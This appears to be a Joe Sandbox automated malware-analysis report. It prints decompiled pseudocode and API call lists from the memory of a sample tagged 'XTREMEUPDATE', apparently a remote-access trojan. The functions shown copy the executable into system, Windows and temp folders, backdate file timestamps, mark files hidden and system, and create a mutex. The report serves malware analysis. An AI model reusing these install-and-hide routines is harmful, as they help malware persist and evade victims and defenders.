Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C84914, Relevance: 6.2, APIs: 4, Instructions: 180

C-Code - Quality: 77%

			E00C84914(void* __eax, intOrPtr __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _v1520;
				char _v1542;
				char _v1564;
				char _v1566;
				void _v6176;
				char _v6180;
				char _v6184;
				intOrPtr _t29;
				void* _t35;
				void* _t39;
				int _t45;
				void* _t55;
				int _t61;
				intOrPtr _t85;
				void* _t87;
				intOrPtr _t102;
				void* _t106;
				WCHAR* _t131;
				void* _t134;

				_t101 = __edx;
				_t85 = __ebx;
				_push(__eax);
				_push(__ebx);
				_v6184 = 0;
				_v6180 = 0;
				_t131 = memcpy( &_v6176, __edx, 0x607 << 2);
				_push(_t134);
				_push(0xc84b74);
				_push( *[fs:eax]);
				 *[fs:eax] = _t134 + 0xffffffffffffe7ec;
				if(_v1566 == 0) {
					L26:
					_pop(_t102);
					 *[fs:eax] = _t102;
					_push(E00C84B7B);
					return E00C81770( &_v6184, 2);
				} else {
					_t29 = _v1520;
					if(_t29 != 0) {
						__eflags = _t29 - 1;
						if(_t29 != 1) {
							__eflags = _t29 - 2;
							if(_t29 != 2) {
								__eflags = _t29 - 3;
								if(_t29 != 3) {
									__eflags = _t29 - 4;
									if(__eflags != 0) {
										__eflags = _t29 - 5;
										if(_t29 == 5) {
											_t85 = E00C82FE0();
										}
									} else {
										_t85 = E00C833A8(E00C8310C(), E00C84B84, __eflags);
									}
								} else {
									__eflags = E00C83100();
									if(__eflags == 0) {
										_t85 = E00C833A8(E00C8310C(), E00C84B84, __eflags);
									} else {
										_t85 = E00C833A8(E00C83100(), E00C84B84, __eflags);
									}
								}
							} else {
								_t85 = E00C83060(_t101);
							}
						} else {
							E00C83034();
							_t85 = _t29;
						}
					} else {
						_t85 = E00C83008();
					}
					E00C81970( &_v6180, 0xb,  &_v1542);
					_t140 = _v6180;
					if(_v6180 != 0) {
						_t85 = E00C833A8(E00C833A8(_t85,  &_v1542, _t140), E00C84B84, _t140);
					}
					_push(E00C833A8(_t85,  &_v1564, _t140));
					_t35 = E00C82E48(_t131);
					_pop(_t106);
					if(E00C83960(_t131, _t35 + _t35, _t106) != 1) {
						_t39 = E00C834C4(_t85);
						_t142 = _t39;
						if(_t39 != 0) {
							SetFileAttributesW(E00C833A8(_t85,  &_v1564, _t142), 0x80); // executed
							_t45 = CopyFileW(_t131, E00C833A8(_t85,  &_v1564, _t142), 0); // executed
							asm("sbb eax, eax");
							_t144 = _t45 + 1;
							if(_t45 + 1 != 0) {
								E00C833A8(_t85,  &_v1564, __eflags);
							} else {
								_t87 = E00C833A8(E00C8310C(), E00C84B84, _t144);
								E00C81970( &_v6184, 0xb,  &_v1542);
								_t145 = _v6184;
								if(_v6184 != 0) {
									_t87 = E00C833A8(E00C833A8(_t87,  &_v1542, _t145), E00C84B84, _t145);
								}
								_t55 = E00C834C4(_t87);
								_t146 = _t55;
								if(_t55 != 0) {
									SetFileAttributesW(E00C833A8(_t87,  &_v1564, _t146), 0x80);
									_t61 = CopyFileW(_t131, E00C833A8(_t87,  &_v1564, _t146), 0);
									asm("sbb eax, eax");
									_t148 = _t61 + 1;
									if(_t61 + 1 != 0) {
										E00C833A8(_t87,  &_v1564, _t148);
									}
								}
							}
						}
					}
					goto L26;
				}
			}

APIs

SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000080), ref: 00C84B11

Part of subcall function 00C83060: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00C8FAC0,00000000,00C8498E,00000000,00C84B74,?,00C8E07C,?,00000000), ref: 00C83077

Part of subcall function 00C83034: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00C83044

CopyFileW.KERNEL32(00C8FAC0,00000000,00000000), ref: 00C84B27

Part of subcall function 00C82FE0: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00C849F0,00000000,00C84B74,?,00C8E07C,?,00000000), ref: 00C82FEF
Part of subcall function 00C82FE0: GetTempPathW.KERNEL32(00000104,00000000), ref: 00C82FFC

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

Part of subcall function 00C834C4: lstrlenW.KERNEL32(00000000), ref: 00C834EB
Part of subcall function 00C834C4: CreateDirectoryW.KERNEL32(?,00000000,00000000), ref: 00C83583

SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00C84A79
CopyFileW.KERNEL32(00C8FAC0,00000000,00000000), ref: 00C84A8F

Part of subcall function 00C83008: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00C83018

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C8313C, Relevance: 6.1, APIs: 4, Instructions: 76

C-Code - Quality: 57%

			E00C8313C(int __eax, void* __ebx, void* __esi) {
				void* _v8;
				struct _ITEMIDLIST* _v12;
				char _v16;
				long _t21;
				intOrPtr* _t25;
				void* _t28;
				struct _ITEMIDLIST* _t29;
				void* _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				int _t44;
				void* _t46;
				void* _t47;
				intOrPtr _t48;

				_t46 = _t47;
				_t48 = _t47 + 0xfffffff4;
				_v16 = 0;
				_t44 = __eax;
				_push(_t46);
				_push(0xc83205);
				_push( *[fs:eax]);
				 *[fs:eax] = _t48;
				E00C8238C( &_v16);
				_push(E00C8238C( &_v16));
				L00C83124();
				_t35 = 0;
				if(_v16 != 0) {
					_push(_t46);
					_push(0xc831e8);
					_push( *[fs:eax]);
					 *[fs:eax] = _t48;
					_t21 = SHGetSpecialFolderLocation(0, _t44,  &_v12); // executed
					if(E00C83118(_t21) != 0) {
						_t28 = VirtualAlloc(0, 0x208, 0x1000, 4); // executed
						_t35 = _t28;
						_push(_t35);
						_t29 = _v12;
						_push(_t29); // executed
						L00C83134(); // executed
						asm("sbb eax, eax");
						if(_t29 + 1 == 0) {
							_t35 = 0;
						}
					}
					_v8 = _t35;
					_pop(_t41);
					 *[fs:eax] = _t41;
					_t25 = _v16;
					return  *((intOrPtr*)( *_t25 + 0x14))(_t25, _v12, E00C831EF);
				} else {
					_v8 = 0;
					_pop(_t42);
					 *[fs:eax] = _t42;
					_push(E00C8320C);
					return E00C8238C( &_v16);
				}
			}

0x00c8313d
0x00c8313f
0x00c83146
0x00c83149
0x00c8314d
0x00c8314e
0x00c83153
0x00c83156
0x00c8315c
0x00c83169
0x00c8316a
0x00c8316f
0x00c83175
0x00c8317e
0x00c8317f
0x00c83184
0x00c83187
0x00c83191
0x00c8319d
0x00c831ad
0x00c831b2
0x00c831b4
0x00c831b5
0x00c831b8
0x00c831b9
0x00c831c1
0x00c831c6
0x00c831c8
0x00c831c8
0x00c831c6
0x00c831ca
0x00c831cf
0x00c831d2
0x00c831de
0x00c831e7
0x00c83177
0x00c83177
0x00c831f1
0x00c831f4
0x00c831f7
0x00c83204
0x00c83204

APIs

SHGetMalloc.SHELL32(00000000), ref: 00C8316A
SHGetSpecialFolderLocation.SHELL32(00000000,0000001A,?), ref: 00C83191
VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00C831E8,?,00000000,00C83205,?,?), ref: 00C831AD
SHGetPathFromIDListW.SHELL32(?,00000000), ref: 00C831B9

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C83E00, Relevance: 6.1, APIs: 4, Instructions: 60

APIs

GetCurrentProcess.KERNEL32(?,00C91F1C), ref: 00C83E1E
IsWow64Process.KERNELBASE(00000000,?,00C91F1C), ref: 00C83E24
OpenProcess.KERNEL32(00000400,00000000,?), ref: 00C83E46
CloseHandle.KERNEL32(?), ref: 00C83E92

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C83218, Relevance: 6.0, APIs: 4, Instructions: 48
file

C-Code - Quality: 89%

			E00C83218(WCHAR* __eax, void* __edx, long _a4, intOrPtr _a8) {
				long _v8;
				void* _t6;
				void* _t13;
				void* _t15;
				void* _t16;

				_t15 = __edx;
				_t13 = 0;
				_t6 = CreateFileW(__eax, 0x40000000, 2, 0, 2, 0, 0); // executed
				_t16 = _t6;
				if(_t16 != 0xffffffff) {
					if(_a8 == 0 && _a4 == 0xffffffff) {
						SetFilePointer(_t16, 0, 0, 0);
					}
					WriteFile(_t16, _t15, _a4,  &_v8, 0); // executed
					asm("sbb ebx, ebx");
					_t13 = _t13 + 1;
				}
				CloseHandle(_t16);
				return _t13;
			}

0x00c8321f
0x00c83221
0x00c83233
0x00c83238
0x00c8323d
0x00c83243
0x00c83252
0x00c83252
0x00c83263
0x00c8326b
0x00c8326d
0x00c8326d
0x00c8326f
0x00c8327b

APIs

CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00C83233
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00C8E07C,?,00000000,?,?,00C89E6B,0000181C,00000000,00000000,00000000,00000080,00000000), ref: 00C83252
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00C83263
CloseHandle.KERNEL32(00000000), ref: 00C8326F

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C83BC4, Relevance: 4.6, APIs: 3, Instructions: 65
time

C-Code - Quality: 72%

			E00C83BC4(void* __eax, void* __ebx, short __ecx, short __edx, short _a4, short _a8, short _a12, short _a16) {
				char _v5;
				void* _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				struct _SYSTEMTIME _v44;
				void* _t41;
				int _t46;
				void* _t48;
				short _t52;
				intOrPtr _t53;
				void* _t56;
				void* _t61;

				_t52 = __edx;
				_t48 = __eax;
				_v5 = 0;
				_push(_t56);
				_push(0xc83c74);
				_push( *[fs:eax]);
				 *[fs:eax] = _t56 + 0xffffffd8;
				_v44.wYear = __edx;
				_v44.wMonth = __ecx;
				_v44.wDay = _a16;
				_v44.wHour = _a12;
				_v44.wMinute = _a8;
				_v44.wSecond = _a4;
				if(SystemTimeToFileTime( &_v44,  &_v28) != 0 && LocalFileTimeToFileTime( &_v28,  &_v20) != 0) {
					_v12 = E00C83B9C(_t48);
					_t41 = _v12;
					asm("cdq");
					if(_t52 == 0) {
						_t61 = _t41 - 0xffffffff;
					}
					if(_t61 != 0) {
						_t46 = SetFileTime(_v12,  &_v20,  &_v20,  &_v20); // executed
						if(_t46 != 0) {
							_v5 = 1;
						}
					}
				}
				_pop(_t53);
				 *[fs:eax] = _t53;
				_push(E00C83C7B);
				return E00C83BBC(_v12);
			}

0x00c83bc4
0x00c83bcb
0x00c83bcd
0x00c83bd3
0x00c83bd4
0x00c83bd9
0x00c83bdc
0x00c83bdf
0x00c83be3
0x00c83beb
0x00c83bf3
0x00c83bfb
0x00c83c03
0x00c83c16
0x00c83c30
0x00c83c33
0x00c83c36
0x00c83c3a
0x00c83c3c
0x00c83c3c
0x00c83c3f
0x00c83c51
0x00c83c58
0x00c83c5a
0x00c83c5a
0x00c83c58
0x00c83c3f
0x00c83c60
0x00c83c63
0x00c83c66
0x00c83c73

APIs

SystemTimeToFileTime.KERNEL32(?,?,00000000,00C83C74,?,00000000), ref: 00C83C0F
LocalFileTimeToFileTime.KERNEL32(?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C20

Part of subcall function 00C83B9C: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02000000,00000000), ref: 00C83BB2

SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C51

Part of subcall function 00C83BBC: CloseHandle.KERNEL32(?), ref: 00C83BBD

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C834C4, Relevance: 3.1, APIs: 2, Instructions: 73
string

C-Code - Quality: 100%

			E00C834C4(WCHAR* __eax, short _a12243837) {
				short _v1054;
				signed int _t32;
				void* _t33;
				short _t35;
				void* _t43;
				signed int _t45;
				signed int _t46;
				short* _t49;
				short* _t50;
				intOrPtr* _t51;
				WCHAR* _t52;
				intOrPtr* _t53;

				_t52 = __eax;
				_t51 = _t53;
				_t43 = 1;
				if(E00C834AC(__eax) == 0) {
					if(_t52 != 0) {
						_t45 = lstrlenW(_t52) + _t29;
						E00C811E4(_t52, _t45, _t51);
						_t32 = _t45;
						if(_t32 <= 0x207) {
							_t50 = _t51 + _t32 * 2;
							do {
								 *_t50 = 0;
								_t32 = _t32 + 1;
								_t50 = _t50 + 2;
							} while (_t32 != 0x208);
						}
						_t33 = 0x208;
						_t49 =  &_v1054;
						do {
							 *_t49 = 0;
							_t49 = _t49 + 2;
							_t33 = _t33 - 1;
						} while (_t33 != 0);
						_t46 = 0;
						_a12243837 =  *_t51;
						while( *((short*)(_t51 + _t46 * 2)) != 0) {
							while(1) {
								_t35 =  *((intOrPtr*)(_t51 + _t46 * 2));
								if(_t35 == 0x5c || _t35 == 0) {
									break;
								}
								 *((short*)(_t53 + 0x412 + _t46 * 2)) = _t35;
								_t46 = _t46 + 1;
							}
							 *((short*)(_t53 + 0x412 + _t46 * 2)) =  *((intOrPtr*)(_t51 + _t46 * 2));
							_t46 = _t46 + 1;
							if(E00C834AC( &_v1054) != 0) {
								continue;
							} else {
								CreateDirectoryW( &_v1054, 0); // executed
								if(E00C834AC(_t52) == 0) {
									continue;
								}
							}
							goto L14;
						}
					}
					L14:
					_t43 = E00C834AC(_t52);
				}
				return _t43;
			}

0x00c834cd
0x00c834cf
0x00c834d1
0x00c834dc
0x00c834e4
0x00c834f2
0x00c834fa
0x00c834ff
0x00c83506
0x00c83508
0x00c8350b
0x00c8350b
0x00c83510
0x00c83511
0x00c83514
0x00c8350b
0x00c8351b
0x00c83520
0x00c83527
0x00c83527
0x00c8352c
0x00c8352f
0x00c8352f
0x00c83532
0x00c83538
0x00c83593
0x00c8354d
0x00c8354d
0x00c83555
0x00000000
0x00000000
0x00c83544
0x00c8354c
0x00c8354c
0x00c83560
0x00c83568
0x00c83577
0x00000000
0x00c83579
0x00c83583
0x00c83591
0x00000000
0x00000000
0x00c83591
0x00000000
0x00c83577
0x00c83593
0x00c8359a
0x00c835a1
0x00c835a1
0x00c835ae

APIs

Part of subcall function 00C834AC: GetFileAttributesW.KERNEL32(00000000,00C834DA), ref: 00C834AD

lstrlenW.KERNEL32(00000000), ref: 00C834EB
CreateDirectoryW.KERNEL32(?,00000000,00000000), ref: 00C83583

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C81664, Relevance: 3.1, APIs: 2, Instructions: 68

C-Code - Quality: 31%

			E00C81664() {
				struct HINSTANCE__* _t24;
				intOrPtr _t32;
				void* _t42;

				if( *0x00C8C5BC != 0 ||  *0xc8c024 == 0) {
					L3:
					if( *0xc8b004 != 0) {
						 *0xc8b06c();
					}
					L5:
					while(1) {
						if( *((char*)(0xc8c5bc)) == 2 &&  *0xc8b000 == 0) {
							 *0x00C8C5A0 = 0;
						}
						 *0xc8b034();
						if( *((char*)(0xc8c5bc)) <= 1 ||  *0xc8b000 != 0) {
							if( *0x00C8C5A4 != 0) {
								 *0xc8b024();
								_t32 =  *((intOrPtr*)(0xc8c5a4));
								_t7 = _t32 + 0x10; // 0x0
								_t24 =  *_t7;
								_t8 = _t32 + 4; // 0xc80000
								if(_t24 !=  *_t8 && _t24 != 0) {
									FreeLibrary(_t24);
								}
							}
						}
						 *0xc8b038();
						if( *((char*)(0xc8c5bc)) == 1) {
							 *0x00C8C5B8();
						}
						if( *((char*)(0xc8c5bc)) != 0) {
							E00C81634();
						}
						if( *0xc8c594 == 0) {
							if( *0xc8c014 != 0) {
								 *0xc8c014();
							}
							ExitProcess( *0xc8b000); // executed
						}
						memcpy(0xc8c594,  *0xc8c594, 0xb << 2);
						_t42 = _t42 + 0xc;
						0xc8b000 = 0xc8b000;
					}
				} else {
					do {
						 *0xc8c024 = 0;
						 *((intOrPtr*)( *0xc8c024))();
					} while ( *0xc8c024 != 0);
					goto L3;
				}
			}

0x00c8167b
0x00c81693
0x00c8169a
0x00c8169c
0x00c8169c
0x00000000
0x00c816a2
0x00c816a6
0x00c816af
0x00c816af
0x00c816b2
0x00c816bc
0x00c816c8
0x00c816ca
0x00c816d0
0x00c816d3
0x00c816d3
0x00c816d6
0x00c816d9
0x00c816e0
0x00c816e0
0x00c816d9
0x00c816c8
0x00c816e5
0x00c816ef
0x00c816f1
0x00c816f1
0x00c816f8
0x00c816fa
0x00c816fa
0x00c81702
0x00c8170b
0x00c8170d
0x00c8170d
0x00c81716
0x00c81716
0x00c81727
0x00c81727
0x00c81729
0x00c81729
0x00c81682
0x00c81682
0x00c81688
0x00c8168c
0x00c8168e
0x00000000
0x00c81682

APIs

FreeLibrary.KERNEL32(00C80000,?,00C8E07C,?,00000001,00C8173E,00C8118B,00C811D3,?,00000000), ref: 00C816E0
ExitProcess.KERNEL32(00000000,?,00C8E07C,?,00000001,00C8173E,00C8118B,00C811D3,?,00000000), ref: 00C81716

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C82FE0, Relevance: 3.0, APIs: 2, Instructions: 13

C-Code - Quality: 100%

			E00C82FE0() {
				WCHAR* _t1;
				WCHAR* _t4;

				_t1 = VirtualAlloc(0, 0x208, 0x1000, 4); // executed
				_t4 = _t1;
				GetTempPathW(0x104, _t4);
				return _t4;
			}

0x00c82fef
0x00c82ff4
0x00c82ffc
0x00c83004

APIs

VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00C849F0,00000000,00C84B74,?,00C8E07C,?,00000000), ref: 00C82FEF
GetTempPathW.KERNEL32(00000104,00000000), ref: 00C82FFC

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C83674, Relevance: 3.0, APIs: 2, Instructions: 12

C-Code - Quality: 100%

			E00C83674(WCHAR* __eax) {
				signed int _t2;
				int _t6;
				WCHAR* _t7;

				_t7 = __eax;
				_t2 = GetFileAttributesW(__eax); // executed
				_t6 = SetFileAttributesW(_t7, _t2 | 7); // executed
				return _t6;
			}

0x00c83675
0x00c83678
0x00c83688
0x00c8368e

APIs

GetFileAttributesW.KERNEL32(00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C83678
SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000), ref: 00C83688

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C836D8, Relevance: 2.6, APIs: 2, Instructions: 72

C-Code - Quality: 100%

			E00C836D8(void* __eax, void* __eflags) {
				void* _t3;
				void* _t6;
				void* _t15;
				void* _t25;
				void* _t33;
				void* _t35;
				void* _t52;

				_t35 = __eax;
				_t3 = E00C836A8(__eax, 0x5c, __eflags);
				_t56 = _t3 + 1;
				if(_t3 + 1 != 0) {
					L2:
					_t6 = E00C836A8(_t35, 0x5c, _t57);
					_t58 = _t6 + 1;
					if(_t6 + 1 == 0) {
						__eflags = E00C836A8(_t35, 0x2f, __eflags) + 1;
						if(__eflags != 0) {
							_t15 = VirtualAlloc(0, E00C836A8(_t35, 0x2f, __eflags) + _t13, 0x1000, 4);
							__eflags = E00C836A8(_t35, 0x2f, __eflags) + _t17;
							E00C82914(_t15, _t35);
							_t52 = E00C833A8(_t15, 0xc837ac, E00C836A8(_t35, 0x2f, __eflags) + _t17);
						}
					} else {
						_t25 = VirtualAlloc(0, E00C836A8(_t35, 0x5c, _t58) + _t23, 0x1000, 4); // executed
						E00C836A8(_t35, 0x5c, _t58);
						E00C82914(_t25, _t35);
						_t52 = E00C833A8(_t25, E00C837A8, _t58);
					}
					L6:
					return _t52;
				}
				_t33 = E00C836A8(_t35, 0x2f, _t56);
				_t57 = _t33 + 1;
				if(_t33 + 1 == 0) {
					goto L6;
				}
				goto L2;
			}

0x00c836da
0x00c836e2
0x00c836e7
0x00c836e8
0x00c836fc
0x00c83702
0x00c83707
0x00c83708
0x00c8375b
0x00c8375c
0x00c83775
0x00c83789
0x00c8378f
0x00c837a0
0x00c837a0
0x00c8370a
0x00c83721
0x00c8372e
0x00c8373b
0x00c8374c
0x00c8374c
0x00c837a2
0x00c837a6
0x00c837a6
0x00c836f0
0x00c836f5
0x00c836f6
0x00000000
0x00000000
0x00000000

APIs

VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,00000000,00C8A149,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000), ref: 00C83721
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,00000000,00C8A149,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000), ref: 00C83775

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C83542, Relevance: 1.5, APIs: 1, Instructions: 32

C-Code - Quality: 100%

			E00C83542(signed int __ebx, void* __edi, void* __esi, short _a1042) {
				short _t15;
				signed int _t26;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t33;

				_t31 = __esi;
				_t29 = __edi;
				_t26 = __ebx;
				while(1) {
					L2:
					_t15 =  *((intOrPtr*)(_t29 + _t26 * 2));
					if(_t15 != 0x5c && _t15 != 0) {
						break;
					}
					 *((short*)(_t33 + 0x412 + _t26 * 2)) =  *((intOrPtr*)(_t29 + _t26 * 2));
					_t26 = _t26 + 1;
					if(E00C834AC( &_a1042) != 0) {
						L6:
						if( *((short*)(_t29 + _t26 * 2)) != 0) {
							continue;
						}
					} else {
						CreateDirectoryW( &_a1042, 0); // executed
						if(E00C834AC(_t31) == 0) {
							goto L6;
						}
					}
					_t27 = E00C834AC(_t31);
					return _t27;
				}
				 *((short*)(_t33 + 0x412 + _t26 * 2)) = _t15;
				_t26 = _t26 + 1;
				goto L2;
			}

0x00c83542
0x00c83542
0x00c83542
0x00c8354d
0x00c8354d
0x00c8354d
0x00c83555
0x00000000
0x00000000
0x00c83560
0x00c83568
0x00c83577
0x00c83593
0x00c83598
0x00000000
0x00000000
0x00c83579
0x00c83583
0x00c83591
0x00000000
0x00000000
0x00c83591
0x00c835a1
0x00c835ae
0x00c835ae
0x00c83544
0x00c8354c
0x00000000

APIs

CreateDirectoryW.KERNEL32(?,00000000,00000000), ref: 00C83583

Part of subcall function 00C834AC: GetFileAttributesW.KERNEL32(00000000,00C834DA), ref: 00C834AD

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C81B90, Relevance: 1.5, APIs: 1, Instructions: 16

C-Code - Quality: 88%

			E00C81B90(intOrPtr* __eax, void* __edx) {
				intOrPtr _t2;
				intOrPtr* _t3;
				void* _t5;

				_t3 = __eax;
				_t5 = __edx;
				do {
					_t2 =  *_t3;
					if(_t2 != 0) {
						 *_t3 = 0;
						_push(_t2); // executed
						L00C810A0(); // executed
					}
					_t3 = _t3 + 4;
					_t5 = _t5 - 1;
				} while (_t5 != 0);
				return _t2;
			}

0x00c81b92
0x00c81b94
0x00c81b96
0x00c81b96
0x00c81b9a
0x00c81b9c
0x00c81ba2
0x00c81ba3
0x00c81ba3
0x00c81ba8
0x00c81bab
0x00c81bab
0x00c81bb0

APIs

SysFreeString.OLEAUT32(?), ref: 00C81BA3

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C8263C, Relevance: 1.5, APIs: 1, Instructions: 14

C-Code - Quality: 68%

			E00C8263C(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, WCHAR* _a12) {
				void* _t8;

				_t4 = _a12;
				asm("sbb eax, eax");
				_t8 = CreateMutexW(_a4,  &(_a12[0]) & 0x0000007f, _t4); // executed
				return _t8;
			}

0x00c8263f
0x00c82647
0x00c82652
0x00c82658

APIs

CreateMutexW.KERNEL32(?,?,?,?,00C89C68,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C82652

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

